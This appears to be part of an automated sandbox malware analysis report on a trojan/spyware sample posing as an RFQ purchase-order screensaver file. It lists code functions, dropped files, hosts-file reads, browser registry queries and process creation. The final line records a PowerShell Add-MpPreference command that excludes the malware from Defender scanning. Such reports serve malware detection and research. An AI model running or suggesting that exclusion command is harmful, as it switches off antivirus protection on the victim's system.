                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_005C47CF10_2_005C47CF
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeCode function: 10_2_005C47F010_2_005C47F0
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040B8C8511_2_040B8C85
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040B04ED11_2_040B04ED
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040B6E8D11_2_040B6E8D
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040AE6FD11_2_040AE6FD
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040B070D11_2_040B070D
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040AE84D11_2_040AE84D
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040AE84111_2_040AE841
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040AE92011_2_040AE920
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeCode function: 11_2_040CF2DD11_2_040CF2DD
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E90E1312_2_61E90E13
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E491CE12_2_61E491CE
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E2F3B812_2_61E2F3B8
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E4A23B12_2_61E4A23B
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E1721D12_2_61E1721D
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E465DE12_2_61E465DE
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E4250512_2_61E42505
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E387BC12_2_61E387BC
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E7675A12_2_61E7675A
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E2363112_2_61E23631
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E3F98C12_2_61E3F98C
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E5899112_2_61E58991
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E46B4212_2_61E46B42
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E34CDF12_2_61E34CDF
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E1ECB312_2_61E1ECB3
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E40FAC12_2_61E40FAC
                Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 12_2_61E43F9D12_2_61E43F9D
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll A5EF3A78EB333B0E6DCA194EA711DCBB036119A788ECFE125F05176FB0FB70A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 009B3F92 appears 132 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 009B373B appears 253 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0096DF5C appears 137 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0096E2A8 appears 60 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 009DF970 appears 84 times
                Source: RFQ_P.O.1212024.scrStatic PE information: invalid certificate
                Source: sqlite3.dll.12.drStatic PE information: Number of sections : 18 > 10
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.374921549.0000000003904000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.370413221.000000000050F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesctasks.exej% vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.371027207.0000000000870000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr, 00000000.00000000.346541696.00000000014A4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesHIO.exe. vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.375920774.00000000053F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.370413221.00000000004E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ_P.O.1212024.scr
                Source: RFQ_P.O.1212024.scrBinary or memory string: OriginalFilenamesHIO.exe. vs RFQ_P.O.1212024.scr
                Source: C:\Windows\SysWOW64\msinfo32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
                Source: RFQ_P.O.1212024.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: RFQ_P.O.1212024.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PEJmengI.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, bhfevcinMYctH7vReL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ElmNrXtZw4MREHe3PO.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ElmNrXtZw4MREHe3PO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, ElmNrXtZw4MREHe3PO.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ElmNrXtZw4MREHe3PO.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ElmNrXtZw4MREHe3PO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ_P.O.1212024.scr.43ed328.2.raw.unpack, ElmNrXtZw4MREHe3PO.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.RFQ_P.O.1212024.scr.53f0000.5.raw.unpack, bhfevcinMYctH7vReL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ElmNrXtZw4MREHe3PO.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ElmNrXtZw4MREHe3PO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ElmNrXtZw4MREHe3PO.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, bhfevcinMYctH7vReL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winSCR@24/18@25/15
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeMutant created: \Sessions\1\BaseNamedObjects\DWhQxlVSHEWFwnynnXdbqrvj
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrFile created: C:\Users\user\AppData\Local\Temp\tmp61C0.tmpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............$.......$..................................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.$..................................s..............$..... .......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$.......?..........................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$.......Z..........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$.......l..........................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s..............$.....$.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............$.....2.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s....................l.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$..................................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......$.......8..........................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......$.......J..........................s..............$.............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h...............*..........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......d.......P..........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h..........................................s............................X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h..........................................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h..........................................s............................X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h..........................................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......D.......h...............@..........................s............H...............X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......d.......X..........................s............H...............X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.d.......j..........................s............H....... .......X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......$.......x..........................s............H...............X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......$..................................s............................X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......$..................................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............H.......$.......X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......$..................................s............H...............X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......$..................................s............................X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......$..................................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......$..................................s............H...............X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......$..................................s....................l.......X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......$..................................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....D.......h.......$.......!..........................s............H...............X...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D.......h.......$.......-..........................s............H...............X...............Jump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................X.......(.P.............................y.......................................................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................:.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................#;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........5;.........................s.................... .......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................A;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................S;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................._;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....q;.........................s....................$.......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................};.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................;.........................s....................l.......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................;.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........C.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........C.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........C.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L......."D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................L.......4D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......@D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.L.......RD.........................s.................... .......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......^D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......pD.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......|D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......D.........................s....................$.......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........D.........................s....................l.......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........D.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................L........E.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........E.........................s............................................
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................'.........E.R.R.O.R.:. ...L.......X................6........................................".......................'.....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................'.........E.R.R.O.(.P.....L.......X................6..............................................j.................'.....
                Source: RFQ_P.O.1212024.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RFQ_P.O.1212024.scrStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: msinfo32.exe, 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: RFQ_P.O.1212024.scrVirustotal: Detection: 38%
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrFile read: C:\Users\user\Desktop\RFQ_P.O.1212024.scrJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ_P.O.1212024.scr "C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr"
